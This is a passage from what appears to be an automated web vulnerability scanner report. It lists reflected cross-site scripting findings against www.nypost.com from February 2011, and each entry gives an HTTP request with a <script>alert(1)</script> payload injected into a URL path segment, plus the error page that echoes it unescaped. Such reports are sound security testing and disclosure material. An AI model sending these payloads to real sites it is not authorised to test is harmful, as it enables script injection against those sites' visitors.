1.403. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54bae<script>alert(1)</script>ae929d52e38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig54bae<script>alert(1)</script>ae929d52e38/WebPortal/nypost/blocks/ads/ads.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:11 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig54bae<script>alert(1)</script>ae929d52e38/WebPortal/nypost/blocks/ads/ads.js</p>
...[SNIP]...

1.404. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7c8df<script>alert(1)</script>30eeeeb7eba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal7c8df<script>alert(1)</script>30eeeeb7eba/nypost/blocks/ads/ads.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal7c8df<script>alert(1)</script>30eeeeb7eba/nypost/blocks/ads/ads.js</p>
...[SNIP]...

1.405. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2d77<script>alert(1)</script>2bb23490fb3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostb2d77<script>alert(1)</script>2bb23490fb3/blocks/ads/ads.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:15 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostb2d77<script>alert(1)</script>2bb23490fb3/blocks/ads/ads.js</p>
...[SNIP]...

1.406. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1e4f<script>alert(1)</script>7ce5bb7f454 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksb1e4f<script>alert(1)</script>7ce5bb7f454/ads/ads.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:17 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksb1e4f<script>alert(1)</script>7ce5bb7f454/ads/ads.js</p>
...[SNIP]...

1.407. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 61855<script>alert(1)</script>855e2b882b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/ads61855<script>alert(1)</script>855e2b882b8/ads.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/ads61855<script>alert(1)</script>855e2b882b8/ads.js</p>
...[SNIP]...

1.408. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 9e496<script>alert(1)</script>4c16621050e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js9e496<script>alert(1)</script>4c16621050e HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js9e496<script>alert(1)</script>4c16621050e</p>
...[SNIP]...

1.409. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3ec44<script>alert(1)</script>3d0ef34b2ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig3ec44<script>alert(1)</script>3d0ef34b2ab/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig3ec44<script>alert(1)</script>3d0ef34b2ab/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.410. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b50d1<script>alert(1)</script>b5ffdc732ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortalb50d1<script>alert(1)</script>b5ffdc732ac/nypost/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortalb50d1<script>alert(1)</script>b5ffdc732ac/nypost/blocks/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.411. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9c792<script>alert(1)</script>e5e7146490c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost9c792<script>alert(1)</script>e5e7146490c/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost9c792<script>alert(1)</script>e5e7146490c/blocks/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.412. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 32a8b<script>alert(1)</script>13e0d2bb0d8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks32a8b<script>alert(1)</script>13e0d2bb0d8/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:38 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks32a8b<script>alert(1)</script>13e0d2bb0d8/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.413. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f0d4d<script>alert(1)</script>0ecfab08c53 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/breaking_news_barf0d4d<script>alert(1)</script>0ecfab08c53/breaking_news_bar.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:42 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/breaking_news_barf0d4d<script>alert(1)</script>0ecfab08c53/breaking_news_bar.js</p>
...[SNIP]...

1.414. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 1bc0a<script>alert(1)</script>fab6c4d0f2c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js1bc0a<script>alert(1)</script>fab6c4d0f2c HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:43 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js1bc0a<script>alert(1)</script>fab6c4d0f2c</p>
...[SNIP]...

1.415. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fac0d<script>alert(1)</script>a5933bb83a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigfac0d<script>alert(1)</script>a5933bb83a5/WebPortal/nypost/blocks/calendar/calendar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigfac0d<script>alert(1)</script>a5933bb83a5/WebPortal/nypost/blocks/calendar/calendar.css</p>
...[SNIP]...

1.416. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 78004<script>alert(1)</script>edc93eee60c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal78004<script>alert(1)</script>edc93eee60c/nypost/blocks/calendar/calendar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal78004<script>alert(1)</script>edc93eee60c/nypost/blocks/calendar/calendar.css</p>
...[SNIP]...

1.417. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2f079<script>alert(1)</script>f4dff419fbd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost2f079<script>alert(1)</script>f4dff419fbd/blocks/calendar/calendar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:06 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost2f079<script>alert(1)</script>f4dff419fbd/blocks/calendar/calendar.css</p>
...[SNIP]...

1.418. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cd7dc<script>alert(1)</script>cba81287e50 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blockscd7dc<script>alert(1)</script>cba81287e50/calendar/calendar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blockscd7dc<script>alert(1)</script>cba81287e50/calendar/calendar.css</p>
...[SNIP]...

1.419. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload da565<script>alert(1)</script>859f6e65bfa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/calendarda565<script>alert(1)</script>859f6e65bfa/calendar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:11 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/calendarda565<script>alert(1)</script>859f6e65bfa/calendar.css</p>
...[SNIP]...

1.420. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload bcc59<script>alert(1)</script>884f4055345 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.cssbcc59<script>alert(1)</script>884f4055345 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.cssbcc59<script>alert(1)</script>884f4055345</p>
...[SNIP]...

1.421. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d2de8<script>alert(1)</script>4fbf371b36c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

